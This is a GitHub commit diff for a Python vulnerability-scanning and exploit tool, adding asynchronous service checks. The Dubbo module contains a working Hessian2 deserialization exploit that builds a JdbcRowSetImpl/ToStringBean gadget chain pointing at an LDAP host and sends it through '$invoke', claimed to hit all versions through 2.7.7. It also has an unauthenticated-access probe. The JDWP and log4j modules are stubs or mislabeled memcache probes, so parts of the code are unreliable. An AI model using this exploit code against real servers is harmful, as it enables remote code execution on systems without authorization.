update: 2021.09.07 20.15

update: about cms exploit
chibd2000 · Sep 7, 2021 · 9a1239c · 9a1239c
1 parent 36dc92b
commit 9a1239c
Show file tree

Hide file tree

Showing 308 changed files with 14,676 additions and 13,978 deletions.
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
diff --git a/Common/Crawl.py b/Common/Crawl.py
@@ -1,4 +1,6 @@
-
+# coding=utf-8
+# @Author   : zpchcbd HG team
+# @Time     : 2021-09-06 22:14
 
 class Crawl(object):
-    pass
+    pass
diff --git a/Exploit/BaseExploit.py b/Exploit/BaseExploit.py
diff --git a/Exploit/Cms/SangforEdr.py b/Exploit/Cms/SangforEdr.py
@@ -20,7 +20,7 @@ def __init__(self, url, vul_list, requests_proxies):
         self.url = url
         self.vul_list = vul_list                    # 存储漏洞的名字和url
         self.proxies = requests_proxies  # 代理
-        self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
+        self.headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
         self.isExist = False  # 检测该url是否存在漏洞，默认为False，如果测出有漏洞，则设置为True
 
     # 调用各种漏洞检测方法

diff --git a/Exploit/CmsExploit.py b/Exploit/CmsExploit.py
@@ -2,21 +2,26 @@
 # @Author   : zpchcbd HG team
 # @Time     : 2021-09-02 22:30
 
-from exploit.BaseExploit import *
+from exploit.public import *
+from exploit import BaseExploit
+from tqdm import tqdm
 
 
-class CmsScan(Exploit):
-    def __init__(self, domain, queue: asyncio.Queue):
+class CmsScan(BaseExploit):
+
+    def __init__(self, domain, domainList):
         super().__init__()
         self.source = 'CmsScan'
         self.domain = domain
-        self.queue = queue
+        self.domainList = domainList
 
-    def exploit(self, http):
-        pass
+    # @ske
+    async def exploit(self):
+        for domain in self.domainList:
+            pass
 
-    def main(self):
-        pass
+    async def main(self):
+        await self.exploit()
 
 
 if '__main__' == __name__:

diff --git a/Exploit/Service/dubbo.py b/Exploit/Service/dubbo.py
@@ -1,27 +1,81 @@
 # coding=utf-8
+from async_timeout import timeout
+from colorama import Fore
+from tqdm import tqdm
 
 from exploit.service.base import *
+from dubbo.codec.hessian2 import Decoder, new_object
+from dubbo.client import DubboClient
 
 
-# dubbo反序列化漏洞
-
-def dubboScan(ip, port):
+async def checkUnauth(addr):
     try:
-        s = socket.socket()
-        s.connect((str(_ip), 873))
-        s.send(b"@RSYNCD: 31\n")
-        s.send(b'\n')
-        time.sleep(0.5)
-        result = s.recv(1024)
-        if result:
-            for path_name in re.split('\n', result.decode()):
-                if path_name and not path_name.startswith('@RSYNCD: '):
-                    self.ipunauthlist.append({
-                        'name': '未授权访问',
-                        'url': str(_ip),
-                        '组件': 'rsync'
-                    })
+        with timeout(5):
+            reader, writer = await asyncio.open_connection(addr.split(':')[0], int(addr.split(':')[1]))
+            writer.write(b'ls\r\n')
+            data = str(await reader.read(1024))
+            writer.close()
+            if 'com.alibaba.dubbo' in data and ("token=false" in data or "token=true" not in data):
+                tqdm.write(Fore.RED + '[+] Target maybe support dobbo unauth, {}'.format(addr))
+                return {'name': 'unauth', 'url': addr, 'software': 'dubbo'}
     except:
         pass
     finally:
-        s.close()
+        try:
+            writer.close()
+        except NameError:
+            pass
+
+
+# dubbo deserlize, not async, not async func
+async def checkDeserialization(addr):
+    try:
+        client = DubboClient(addr.split(':')[0], int(addr.split(':')[1]))
+
+        JdbcRowSetImpl = new_object(
+            'com.sun.rowset.JdbcRowSetImpl',
+            dataSource='ldap://1.1.1.1',
+            strMatchColumns=["foo"]
+        )
+        JdbcRowSetImplClass = new_object(
+            'java.lang.Class',
+            name="com.sun.rowset.JdbcRowSetImpl",
+        )
+        toStringBean = new_object(
+            'com.rometools.rome.feed.impl.ToStringBean',
+            beanClass=JdbcRowSetImplClass,
+            obj=JdbcRowSetImpl
+        )
+
+        resp = client.send_request_and_return_response(
+            service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
+            # 此处可以是 $invoke、$invokeSync、$echo 等，通杀 2.7.7 及 CVE 公布的所有版本。
+            method_name='$invoke',
+            args=[toStringBean])
+
+        result = str(resp)
+        if 'Fail to decode request due to: RpcInvocation' in result:
+            tqdm.write(Fore.RED + '[+] Target maybe not support deserialization, {}'.format(addr))
+        elif 'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()' in result:
+            tqdm.write(Fore.RED + '[+] Target support deserialization, {}'.format(addr))
+            return {'name': 'deserialization', 'url': addr, 'software': 'dubbo'}
+        else:
+            tqdm.write(Fore.RED + '[+] Target maybe support deserialization, {}'.format(addr))
+            return {'name': 'maybe deserialization', 'url': addr, 'software': 'dubbo'}
+    except:
+        pass
+
+
+async def dubboScan(addr, pbar):
+    vulList = []
+
+    a = await checkUnauth(addr)
+    b = await checkDeserialization(addr)
+
+    if a is not None:
+        vulList.append(a)
+    if b is not None:
+        vulList.append(b)
+    # b = await checkWeakPass(addr)
+    pbar.update(1)
+    return vulList
diff --git a/Exploit/Service/jdwp.py b/Exploit/Service/jdwp.py
@@ -1,26 +1,40 @@
 # coding=utf-8
+from async_timeout import timeout
 
 from exploit.service.base import *
 
 
-def jdwpScan():
-    # JDWP 命令执行
+async def checkRce(addr):
     try:
-        s = socket.socket()
-        s.connect((str(_ip), 873))
-        s.send(b"@RSYNCD: 31\n")
-        s.send(b'\n')
-        time.sleep(0.5)
-        result = s.recv(1024)
-        if result:
-            for path_name in re.split('\n', result.decode()):
-                if path_name and not path_name.startswith('@RSYNCD: '):
-                    self.ipunauthlist.append({
-                        'name': '未授权访问',
-                        'url': str(_ip),
-                        '组件': 'rsync'
-                    })
+        return {'name': 'rce', 'url': addr, 'software': 'jdwp'}
+        # with timeout(5):
+        #     reader, writer = await asyncio.open_connection(addr.split(':')[0], int(addr.split(':')[1]))
+        #     writer.write(b'ls\r\n')
+        #     data = str(await reader.read(1024))
+        #     writer.close()
+        #     if 'com.alibaba.dubbo' in data and ("token=false" in data or "token=true" not in data):
+        #         print('unauth dubbo')
+        #         return {'name': 'unauth', 'url': addr, 'software': 'dubbo'}
     except:
         pass
     finally:
-        s.close()
+        pass
+        # try:
+        #     writer.close()
+        # except NameError:
+        #     pass
+
+
+# byself
+async def jdwpScan(addr, pbar):
+    vulList = []
+    a = await checkRce(addr)
+    if a is not None:
+        vulList.append(a)
+    pbar.update(1)
+    return vulList
+
+if __name__ == '__main__':
+    pass
+
+
diff --git a/Exploit/Service/log4j.py b/Exploit/Service/log4j.py
@@ -6,20 +6,22 @@
 from exploit.service.base import *
 
 
-'''log4j 反序列化'''
-try:
-    s = socket.socket()
-    s.connect((str(_ip), 11211))
-    s.send(b"stats")
-    result = s.recv(1024)
-    if b"STAT version" in result:
-        self.ipunauthlist.append({
-            'name': '未授权访问',
-            'url': str(_ip) + ':11211',
-            '组件': 'Memcache'
-        })
-except:
-    pass
+# log4j 反序列化
+async def log4jScan(addr, pbar):
+    vulList = []
 
-finally:
-    s.close()
+    try:
+        s = socket.socket()
+        s.connect((addr.split(':')[0], int(addr.split(':')[1])))
+        s.send(b"stats")
+        result = s.recv(1024)
+        if b"STAT version" in result:
+            vulList.append({'name': 'deserialization', 'url': addr, 'software': 'log4j'})
+    except:
+        pass
+    finally:
+        try:
+            writer.close()
+        except NameError:
+            pass
+    return vulList
diff --git a/Exploit/Web/IBM.py b/Exploit/Web/IBM.py
@@ -6,20 +6,20 @@
 from tqdm import *
 from colorama import Fore
 
+
 # 全都用tqdm.write(url)打印     能够打印在进度条上方，并将进度条下移一行。
 # 存在漏洞可能得需要红色，使用   tqdm.write(Fore.RED + url)   打印则有颜色
 # 打印一些错误需要灰色 使用   tqdm.write(Fore.WHITE + url)
 # 打印漏洞结果 使用   tqdm.write(Fore.BLACK + url)
 
 
-
 # 模板
 class Detect(threading.Thread):
     name = 'IBM'
 
     def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
         threading.Thread.__init__(self)
-        self.alive_Web_queue = alive_Web_queue      # 存活web的队列
+        self.alive_Web_queue = alive_Web_queue  # 存活web的队列
         self.pbar = pbar  # 进度条
         self.vul_list = vul_list  # 存储漏洞的名字和url
         self.proxies = requests_proxies  # 代理
@@ -34,14 +34,12 @@ def run(self):
             self.pbar.update(1)  # 每完成一个任务，进度条也加+1
             self.alive_Web_queue.task_done()
 
-
     # 调用各种漏洞检测方法
     def run_detect(self, url):
         # 检测是否是IBM
         if self.check(url):
             pass
 
-
     def check(self, url):
         ico_url = url + '/images/ihs/favicon.ico'
         m1 = hashlib.md5()
@@ -60,7 +58,6 @@ def check(self, url):
             return False
 
 
-
 if __name__ == '__main__':
     from queue import Queue
 
@@ -85,6 +82,6 @@ def check(self, url):
     for t in threads:
         t.join()
 
-    tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
+    tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
     for vul in vul_list:
-        tqdm.write(Fore.BLACK + str(vul))
+        tqdm.write(Fore.BLACK + str(vul))